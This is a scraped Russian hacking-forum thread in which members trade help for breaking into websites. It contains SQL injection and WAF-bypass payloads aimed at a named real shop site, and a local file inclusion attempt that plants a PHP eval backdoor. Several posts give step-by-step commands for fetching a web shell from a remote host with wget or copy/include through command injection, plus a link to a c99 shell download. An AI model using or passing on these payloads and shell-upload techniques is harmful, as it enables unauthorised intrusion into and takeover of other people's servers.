Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    через BENCHMARK определил,но уже пишет форбиденн
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    int или intval в скрипте убери, тогда увидешь :D
     
    3 people like this.
  3. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    в каком скрипте?
     
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    В этом параметре нету уязвимости. =\
     
    1 person likes this.
  5. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    ошибка на гл странице dle сайт

    Code:
    Deprecated: Function ereg() is deprecated in [PATH]/engine/modules/register.php on line 41 
    можно ли что то извлеч? или узнать версию?

    стоит нулл
    примерно версии середины лета 2009 года (точно хз не работал с dle)
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
  7. oODungVTOo

    oODungVTOo New Member

    Joined:
    3 Jun 2011
    Messages:
    85
    Likes Received:
    1
    Reputations:
    0
    WAF help please
    http://www.pampling.com/ficha_producto.php?id_producto=27%27+/*!union*/+select+1,2,3,4+--+
     
  8. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    есть форум на vbulletin. На почту не приходит уведомление для реги,тобишь группы нереал посмотреть. Есть ли альтернативный способ, допустим узнать имя любой группы, либо создать её?
     
  9. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    blind sql inj. Фильтруется union. Версия 4-я. Так что тут особо ловить нечего. Юзай проги типа хавиджа, они те и раскрутят скулю и попробуют подобрать по словарю имён таблиц и колонок.
    пример скули:
    Code:
    http://www.pampling.com/ficha_producto.php?id_producto=26+and+1=(select+if(ascii(substr(version(),1))=52,1,0))--+
     
  10. oODungVTOo

    oODungVTOo New Member

    Joined:
    3 Jun 2011
    Messages:
    85
    Likes Received:
    1
    Reputations:
    0
    SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=53,1,0) MySQL 5
    SELECT IF(ASCII(SUBSTR(VERSION(),1,1))=52,1,0) MySQL 4

    I don't see difference at this page........can u help me?
     
  11. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    The second option displaying "Madre e Hijo Nesk". The first option doesn't show anything
     
  12. Sloneny

    Sloneny New Member

    Joined:
    8 Mar 2010
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    file=../../../../../proc/self/environ
    выводит содержимое файла.
    через Tamper записываю
    PHP:
    <?php eval($_GET[e]); ?>
    пытаюсь подключить,
    file=../../../../../proc/self/environ&e=e=phpinfo();
    просто выводит водержимое.
    Где-то сделал ошибку? Или есть обязательные условия для работы такой конструкции?
     
  13. chaby

    chaby Banned

    Joined:
    27 Jul 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    -5
    люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123

    а какой командой мне загрузить шелл подскажите плиз
     
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    index.php?cmd=wget http://site.ru/shell.txt -O shell.php
     
  15. chaby

    chaby Banned

    Joined:
    27 Jul 2010
    Messages:
    5
    Likes Received:
    1
    Reputations:
    -5
    люди имею доступ к выполнению команд на сервере index.php?cmd=echo 123

    а какой командой мне загрузить шелл подскажите плиз

    КТО ПОДСКАЖЕТ ПОДЕЛЮСЬ ШЕЛЛОМ
     
  16. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    посмотри стоит ли wget: index.php?cmd=whereis wget

    Если стоит, делай так:
    wget http://address/shell.txt -O /path/to/shell/shell.php

    з.ы. Папка в которую заливаешь шелл, должна быть открыта на запись. Посмотреть можешь так:
    index.php?cmd=ls -la
     
  17. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    передай <?php phpinfo();?> в заголовке User-agent.

    Сделай так:
    1. index.php?cmd=phpinfo();
    если выведет результат команды phpinfo (ты это увидешь), то выполни такую команду index.php?cmd=copy($_GET,$_GET[o]);&s=ссылка_на_шелл&o=/tmp/sss.php и шелл скопируется в /tmp/sss.php
    дальше делаешь: index.php?cmd=include($_GET);&s=/tmp/sss.php

    2. index.php?cmd=ls -la
    если выведется содержимое текущего каталога, то выполни index.php?cmd=wget -O sss.php ссылка_на_шелл
    шел скопируется в текущую диру, и потом просто открой sss.php

    Соответственно сработает если хватит прав на запись.
     
    _________________________
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://madnet.name/files/download/9_c99madshell.php

    p.s. Твой вопрос разжеван. Увижу еще один вопрос касающийся этого вопроса от тебя, посты все тру, тебя баню.
     
    _________________________
  19. promarketing

    promarketing New Member

    Joined:
    5 Aug 2011
    Messages:
    14
    Likes Received:
    3
    Reputations:
    0
    Posovetuite please web shell kotoriy rabotaet s Oracle bazoy. Est' webshell, mogy gryzit' faili, est' vsya infa dlya konnekta k oracle db. kak posmotret' kakie tam tablicy hotyabi?

    Iz etogo topika nechego rabotyeshego vrode ne nashel http://forum.antichat.ru/thread246807.html

    Spasibo
     
    #17659 promarketing, 15 Aug 2011
    Last edited: 15 Aug 2011
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    например, http://sourceforge.net/projects/phporaadmin/

    Хоть и не шелл.
     
Thread Status:
Not open for further replies.